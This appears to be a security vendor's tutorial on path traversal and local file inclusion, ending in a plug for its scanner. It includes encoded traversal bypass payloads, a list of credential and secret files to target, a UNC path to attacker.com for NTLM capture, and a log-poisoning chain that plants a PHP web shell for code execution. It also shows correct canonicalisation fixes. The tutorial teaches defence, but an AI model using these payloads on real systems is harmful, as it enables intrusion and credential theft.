What Path Traversal Is

Path traversal (also called directory traversal) occurs when user-supplied input is used to construct a file path without proper validation or canonicalisation, allowing an attacker to navigate outside the intended directory. The attack uses sequences like ../ (or their encoded equivalents) to traverse up the directory tree and access arbitrary files on the server.

It affects any feature that reads, downloads, or includes files based on user input: document download APIs, image serving endpoints, template loaders, log file viewers, file managers, report generators. It's a common finding even in modern codebases because developers often add file-serving functionality quickly and validation gets overlooked.

The Classic ../../../etc/passwd Attack

file_server.py (vulnerable) Python
from flask import Flask, request, send_file
import os

app = Flask(__name__)
BASE_DIR = "/var/app/uploads"

# Vulnerable β€” filename from user goes directly into path join
@app.get("/download")
def download():
    filename = request.args.get("file")
    filepath = os.path.join(BASE_DIR, filename)
    return send_file(filepath)

The attacker requests: /download?file=../../../../etc/passwd

The constructed path resolves to /etc/passwd β€” regardless of BASE_DIR. The server happily returns the file.

Common targets beyond /etc/passwd: /etc/shadow (password hashes), /proc/self/environ (environment variables including secrets), ~/.ssh/id_rsa (private keys), application config files with database passwords, /var/log/apache2/access.log (useful for log poisoning).

URL Encoding and Filter Bypass Tricks

Many applications try to filter ../ β€” but naive string replacement is bypassable:

bypass_payloads.txt Text
# Standard
../../../../etc/passwd

# URL encoded
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Double URL encoded
%252e%252e%252f%252e%252e%252fetc%252fpasswd

# If filter strips ../ once:
....//....//....//etc/passwd

# Mix of encodings
..%2f..%2f..%2fetc/passwd

# Null byte (older apps, PHP)
../../etc/passwd%00.jpg

The lesson: don't try to filter traversal sequences. Canonicalise the path and verify it starts with the expected base directory. Filters are always bypassable; canonical path checking is not.

Windows vs Linux Path Differences

Windows path traversal uses backslashes and has additional quirks:

  • Windows supports both \ and / as path separators
  • Drive letter traversal: C:\Windows\System32\drivers\etc\hosts
  • UNC paths: \\attacker.com\share\file β€” can be used for NTLM credential capture
  • Windows path canonicalisation: ...\ and ..../ can work in some parsers

Cross-platform applications that run on both Linux and Windows need to validate paths against the OS-specific rules of the production environment.

Local File Inclusion (LFI) and How It Escalates

In PHP and some older templating systems, path traversal escalates to Local File Inclusion β€” the included file is executed rather than just read. This changes the impact from information disclosure to code execution.

page_loader.php (vulnerable) PHP
// Vulnerable β€” includes user-controlled file path
$page = $_GET['page'];
include("pages/" . $page . ".php");

// Attacker sends: ?page=../../../../var/log/apache2/access.log
// If they've previously injected PHP code into the log, it executes

Combining with Log Poisoning for RCE

LFI + log poisoning is a classic RCE chain. The attacker writes PHP code into a log file via a crafted request, then includes that log file via LFI to trigger execution:

  1. Send a request with PHP code in the User-Agent: User-Agent: <?php system($_GET['cmd']); ?>
  2. Web server logs this to /var/log/apache2/access.log
  3. Exploit LFI: ?page=../../../../var/log/apache2/access
  4. Append command: &cmd=id
  5. Command executes on the server

Session file inclusion is another vector: PHP session files are stored in /tmp/sess_[sessionid]. If you can control part of the session data content, you can plant code in the session file and include it via LFI.

How to Fix It Properly

The correct fix is to canonicalise the path and verify it starts with the intended base directory:

file_server_fixed.py Python
import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
BASE_DIR = os.path.realpath("/var/app/uploads")

@app.get("/download")
def download():
    filename = request.args.get("file", "")
    # Canonicalise: resolve all ../ and symlinks
    filepath = os.path.realpath(os.path.join(BASE_DIR, filename))
    # Verify the resolved path is within the intended directory
    if not filepath.startswith(BASE_DIR + os.sep):
        abort(403)
    if not os.path.isfile(filepath):
        abort(404)
    return send_file(filepath)
file_server.js (Node.js fixed) JavaScript
const path = require('path');
const fs = require('fs');
const BASE_DIR = path.resolve('/var/app/uploads');

app.get('/download', (req, res) => {
    const filename = req.query.file || '';
    const filepath = path.resolve(path.join(BASE_DIR, filename));
    // Ensure resolved path is within BASE_DIR
    if (!filepath.startsWith(BASE_DIR + path.sep)) {
        return res.status(403).send('Forbidden');
    }
    res.sendFile(filepath);
});

Use os.path.realpath, not os.path.normpath: normpath resolves the path lexically but doesn't follow symlinks. realpath resolves symlinks too β€” important because a symlink inside your upload directory could otherwise point outside it.

SAST Detection

Path traversal is well-suited to SAST because the vulnerable pattern is consistent: user-controlled input reaching a file system operation (open(), send_file(), include(), readFile()) without proper path canonicalisation and boundary checking. SAST tools trace the taint flow from HTTP request parameters to file system sinks and flag cases where no canonicalisation occurs.

  • Look for os.path.join with user input that doesn't precede a realpath + startswith check
  • PHP include, require, file_get_contents with unsanitised variables
  • Node.js fs.readFile, res.sendFile, path.join without path.resolve guard
  • Java new File(basePath, userInput) without canonical path verification

Find Path Traversal Vulnerabilities Automatically

AquilaX SAST traces tainted paths from HTTP input to filesystem operations β€” catching directory traversal before it reaches your production servers.

Start Free Scan